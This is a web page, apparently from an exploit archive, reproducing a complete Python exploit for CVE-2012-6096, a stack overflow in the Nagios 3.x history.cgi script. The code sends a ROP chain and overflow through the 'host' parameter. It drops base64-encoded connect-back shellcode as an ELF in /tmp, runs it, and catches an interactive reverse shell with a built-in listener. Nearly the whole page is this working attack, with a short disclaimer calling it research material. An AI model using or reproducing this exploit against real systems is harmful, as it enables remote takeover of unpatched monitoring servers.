Nagios 3.x Remote Command Execution
测试方法:
程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
1 #!/usr/bin/python 2 # 3 # CVE-2012-6096 - Nagios history.cgi Remote Command Execution 4 # =========================================================== 5 # Another year, another reincarnation of classic and trivial 6 # bugs to exploit. This time we attack Nagios.. or more 7 # specifically, one of its CGI scripts. [1] 8 # 9 # The Nagios code is an amazing monster. It reminds me a 10 # lot of some of my early experiments in C, back when I 11 # still had no clue what I was doing. (Ok, fair enough, 12 # I still don't, heheh.) 13 # 14 # Ok, I'll come clean. This exploit doesn't exactly 15 # defeat FORTIFY. This approach is likely to work just FINE 16 # on other crippled distro's though, think of stuff like 17 # ArchLinux, Slackware, and all those Gentoo kids twiddling 18 # their CFLAGS. [2] (Oh and hey, BSD and stuff!) 19 # 20 # I do some very stupid shit(tm) here that might make an 21 # exploit coder or two cringe. My sincere apologies for that. 22 # 23 # Cold beer goes out to my friends who are still practicing 24 # this dying but interesting type of art: 25 # 26 # * brainsmoke * masc * iZsh * skier_ * steve * 27 # 28 # -- blasty <blasty@fail0verflow.com> / 2013-01-08 29 # 30 # References: 31 # [1] http://permalink.gmane.org/gmane.comp.security.oss.general/9109 32 # [2] http://www.funroll-loops.info/ 33 # 34 # P.S. To the clown who rebranded my Samba exploit: j00 s0 1337 m4n! 35 # Next time you rebrand an exploit at least show some diligence and 36 # add some additional targets or improvements, so we can all profit! 37 # 38 # P.P.S. hey, Im not _burning_ bugs .. this is a 2day, enjoy! 39 # 40 import os, sys, socket,struct, urllib, threading,SocketServer, time 41 from base64 import b64encode 42 SocketServer.TCPServer.allow_reuse_address =True 43 targets =[ 44 { 45 "name":"Debian (nagios3_3.0.6-4~lenny2_i386.deb)", 46 "smash_len":0xc37, 47 "unescape":0x0804b620, 48 "popret":0x08048fe4, 49 "hostbuf":0x080727a0, 50 "system_plt":0x08048c7c 51 } 52 ] 53 def u32h(v): 54 returnstruct.pack("<L", v).encode('hex') 55 def u32(v, hex =False): 56 returnstruct.pack("<L", v) 57 # Tiny ELF stub based on: 58 # http://www.muppetlabs.com/~breadbox/software/tiny/teensy.html 59 def make_elf(sc): 60 elf_head = \ 61 "7f454c46010101000000000000000000"+ \ 62 "02000300010000005480040834000000"+ \ 63 "00000000000000003400200001000000"+ \ 64 "00000000010000000000000000800408"+ \ 65 "00800408"+ u32h(0x54+len(sc))*2+ \ 66 "0500000000100000" 67 return elf_head.decode("hex")+ sc 68 # interactive connectback listener 69 class connectback_shell(SocketServer.BaseRequestHandler): 70 def handle(self): 71 print"\n[!!] K4P0W!@# -> shell from %s"%self.client_address[0] 72 print"[**] This shell is powered by insane amounts of illegal substances" 73 s =self.request 74 import termios, tty,select, os 75 old_settings = termios.tcgetattr(0) 76 try: 77 tty.setcbreak(0) 78 c =True 79 os.write(s.fileno(),"id\nuname -a\n") 80 while c: 81 for i inselect.select([0, s.fileno()],[],[],0)[0]: 82 c = os.read(i,1024) 83 if c: 84 if i ==0: 85 os.write(1, c) 86 os.write(s.fileno()if i ==0else1, c) 87 exceptKeyboardInterrupt:pass 88 finally: termios.tcsetattr(0, termios.TCSADRAIN, old_settings) 89 return 90 classThreadedTCPServer(SocketServer.ThreadingMixIn,SocketServer.TCPServer): 91 pass 92 if len(sys.argv)!=5: 93 print"\n >> Nagios 3.x CGI remote code execution by <blasty@fail0verflow.com>" 94 print" >> \"Jetzt geht's Nagi-los!\"\n" 95 print" usage: %s <base_uri> <myip> <myport> <target>\n"%(sys.argv[0]) 96 print" targets:" 97 i =0 98 for target in targets: 99 print" %02d) %s"%(i, target['name']) 100 i = i+1 101 print"" 102 sys.exit(-1) 103 target_no =int(sys.argv[4]) 104 if target_no <0or target_no > len(targets): 105 print"Invalid target specified" 106 sys.exit(-1) 107 target = targets[int(sys.argv[4])] 108 # comment this shit if you want to setup your own listener 109 server =ThreadedTCPServer((sys.argv[2],int(sys.argv[3])), connectback_shell) 110 server_thread = threading.Thread(target=server.serve_forever) 111 server_thread.daemon =True 112 server_thread.start() 113 # shellcode to be executed 114 # vanilla x86/linux connectback written by a dutch gentleman 115 # close to a decade ago. 116 cback = \ 117 "31c031db31c951b10651b10151b10251"+ \ 118 "89e1b301b066cd8089c231c031c95151"+ \ 119 "68badc0ded6668b0efb102665189e7b3"+ \ 120 "1053575289e1b303b066cd8031c939c1"+ \ 121 "740631c0b001cd8031c0b03f89d3cd80"+ \ 122 "31c0b03f89d3b101cd8031c0b03f89d3"+ \ 123 "b102cd8031c031d250686e2f7368682f"+ \ 124 "2f626989e3505389e1b00bcd8031c0b0"+ \ 125 "01cd80" 126 cback = cback.replace("badc0ded", socket.inet_aton(sys.argv[2]).encode("hex")) 127 cback = cback.replace("b0ef",struct.pack(">H",int(sys.argv[3])).encode("hex")) 128 # Eww.. so there's some characters that dont survive the trip.. 129 # yes, even with the unescape() call in our return-chain.. 130 # initially I was going to use some /dev/tcp based connectback.. 131 # but /dev/tcp isn't available/accesible everywhere, so instead 132 # we drop an ELF into /tmp and execute that. The '>' characters 133 # also doesn't survive the trip so we work around this by using 134 # the tee(1) utility. 135 # If your target has a /tmp that is mounted with noexec flag, 136 # is severely firewalled or guarded by trained (watch)dogs.. 137 # you might want to reconsider this approach! 138 cmd = \ 139 "rm -rf /tmp/x;"+ \ 140 "echo "+ b64encode(make_elf(cback.decode('hex')))+"|"+ \ 141 "base64 -d|tee /tmp/x|chmod +x /tmp/x;/tmp/x;" 142 # Spaces (0x20) are also a problem, they always ends up as '+' :-( 143 # so apply some olde trick and rely on $IFS for argv separation 144 cmd = cmd.replace(" ","${IFS}") 145 # Basic return-2-whatever/ROP chain. 146 # We return into cgi_input_unescape() to get rid of 147 # URL escaping in a static buffer we control, and then 148 # we return into system@plt for the moneyshot. 149 # 150 # Ergo sum: 151 # There's no memoryleak or whatever needed to leak libc 152 # base and bypass ASLR.. This entire Nagios PoS is stringed 153 # together by system() calls, so pretty much every single one 154 # of their little silly binaries comes with a PLT entry for 155 # system(), huzzah! 156 rop =[ 157 u32(target['unescape']), 158 u32(target['popret']), 159 u32(target['hostbuf']), 160 u32(target['system_plt']), 161 u32(0xdeafbabe), 162 u32(target['hostbuf']) 163 ] 164 # Yes.. urllib, so it supports HTTPS, basic-auth and whatnot 165 # out of the box. Building HTTP requests from scratch is so 90ies.. 166 params= urllib.urlencode({ 167 'host': cmd +"A"*(target['smash_len']-len(cmd))+"".join(rop) 168 }) 169 print"[>>] CL1Q .." 170 f = urllib.urlopen(sys.argv[1]+"/cgi-bin/history.cgi?%s"%params) 171 print"[>>] CL4Q .." 172 f.read() 173 # TRIAL PERIOD ACTIVE, LOL! 174 time.sleep(0x666) 175 server.shutdown()
